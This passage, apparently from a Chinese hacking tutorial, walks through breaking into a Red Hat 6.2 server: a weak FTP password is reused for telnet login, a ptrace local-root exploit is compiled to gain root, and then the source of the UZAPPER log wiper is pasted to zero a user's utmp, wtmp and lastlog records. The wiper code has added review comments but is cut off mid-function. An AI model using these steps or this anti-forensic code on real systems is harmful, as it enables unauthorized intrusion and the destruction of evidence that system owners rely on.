B:本地溢出

本地溢出需要一个具有Shell权限的帐号,这个帐号可以通过pop3或ftp弱密码得到(这类服务验证的往往就是系统帐号,所以同一组用户名和口令也能用于telnet登录),照样举个例子:

流光扫描...一会儿得到了一个ftp帐号(webmaster,webmaster),先telnet上去!

telnet *.174.62.135

Red Hat Linux release 6.2 (Cartman) ----->>linux 6.2,容易搞定!

Kernel 2.2.12-20kr2smp on an i686

login: webmaster

Password:

Last login: Wed Apr 24 02:21:58 from *.*.*.*

You have mail. ----->>这家伙有新邮件,不过我没兴趣!

[webmaster@ns webmaster]$ ----->>气人的普通用户$

[webmaster@ns webmaster]$cat >ts.c

... ----->>要学会利用网络资源,自己找,当是练习!

[webmaster@ns webmaster]$gcc -o ts ts.c ----->>还是用gcc编译。

In file included from /usr/include/asm/user.h:5,

from /usr/include/linux/user.h:1,

from ts.c:30:

/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined

/usr/include/sys/ptrace.h:103: warning: this is the location of the previous def

inition

[webmaster@ns webmaster]$ ls

Desktop/ Mail/ ts* ts.c

[webmaster@ns webmaster]$ ./ts

attached

bash# su root

[root@ns webmaster]# ----->>搞定,看见#我就高兴!

[root@ns webmaster]# cat >wipe.c ----->>扫脚印的,这个还是给大家吧,否则有人要扁我了!

/*=============================================================================

UZAPPER Ver1.00 for Solaris, SunOS, IRIX, Linux, FreeBSD

The Shadow Penguin Security ( http://shadowpenguin.backsection.net )

Written by UNYUN ( unewn4th@usa.net )

=============================================================================

*/

#include

#include

#include

#include

#ifdef UTMAXTYPE

#define UTMPX

#include

#endif

#include

#ifndef _PATH_LASTLOG

#include

#endif

#include

#include

#include

/*
 * Per-platform locations of the login accounting files (utmp, wtmp and
 * lastlog), grouped as SVR4, SunOS 4 and BSD layouts.
 * NOTE(review): the code that selects among these is not visible in this
 * excerpt; presumably one set is passed as `path` to the wipe routines.
 * For a defender these are the files whose integrity and contents are
 * worth monitoring and shipping off-host.
 */
#define SVR4_UTMP "/var/adm/utmp"

#define SVR4_WTMP "/var/adm/wtmp"

#define SVR4_LASTLOG "/var/adm/lastlog"

#define SUNOS4_UTMP "/etc/utmp"

#define SUNOS4_WTMP "/usr/adm/wtmp"

#define SUNOS4_LASTLOG "/usr/adm/lastlog"

#define BSD_UTMP "/var/run/utmp"

#define BSD_WTMP "/var/log/wtmp"

#define BSD_LASTLOG "/var/log/lastlog"

/* Size of the path buffer declared in wipe_lastlog(). */
#define MAX_FPATH 512

/*
 * wipe_log - blank out the records of one user in a utmp/wtmp-style file.
 *
 * Reads the file at `path` as a sequence of fixed-size records and
 * overwrites with zero bytes every record whose user-name field begins
 * with `user`.
 *
 *   path  file to process; an empty string is rejected
 *   user  user name to match against each record
 *   type  0 selects the struct utmp layout; any other value selects
 *         struct utmpx, which is only compiled in when UTMPX is defined
 *
 * Returns 1 when `path` is empty, -1 when the file cannot be opened for
 * read/write, and 0 otherwise (after printing the number of records hit).
 *
 * Forensic note: a matching record is zeroed in place, not removed. The
 * code only seeks back by one record and rewrites the same number of
 * bytes, so the slot stays in the file as an all-zero record. Such
 * records are an indicator of tampering that an examiner can look for.
 */
int wipe_log(path,user,type)

char *path,*user;

int type;

{

struct utmp utmp_ent;

#ifdef UTMPX

struct utmpx utmpx_ent;

#endif

void *ent;

char *un;

int sz,fd,c=0;

if (strlen(path)==0) return(1);

/* Pick the record buffer, the user-name field inside it, and the record size. */
if (type==0){

ent=(void *)&utmp_ent;

#ifdef UTMPX

un=(char *)&utmp_ent.ut_user;

#else

un=(char *)&utmp_ent.ut_name;

#endif

sz=sizeof(struct utmp);

}else{

/* NOTE(review): without UTMPX this branch is empty, so ent, un and sz
   are used below uninitialized when type != 0. */
#ifdef UTMPX

ent=(void *)&utmpx_ent;

un=(char *)&utmpx_ent.ut_user;

sz=sizeof(struct utmpx);

#endif

}

/* NOTE(review): `<=0` also treats a valid descriptor 0 as a failure. */
if ((fd=open(path,O_RDWR))<=0) return(-1);

/* Walk the file one record at a time. */
while(read(fd,ent,sz)>0)

/* Prefix comparison over strlen(user) bytes: a longer name that starts
   with `user` matches as well. */
if (!strncmp(un,user,strlen(user))){

memset(ent,0,sz);

/* Step back over the record just read and overwrite it with zeros;
   the results of lseek() and write() are not checked. */
lseek(fd,-sz,SEEK_CUR);

write(fd,ent,sz);

c++;

}

close(fd);

printf("Wiped %d entries of %s from %s.\n",c,user,path);

return(0);

}

int wipe_lastlog(path,user,type)

char *path,*user;

int type;

{

struct passwd *p;

struct lastlog ent;

int fd;

char buffer[MAX_FPATH];

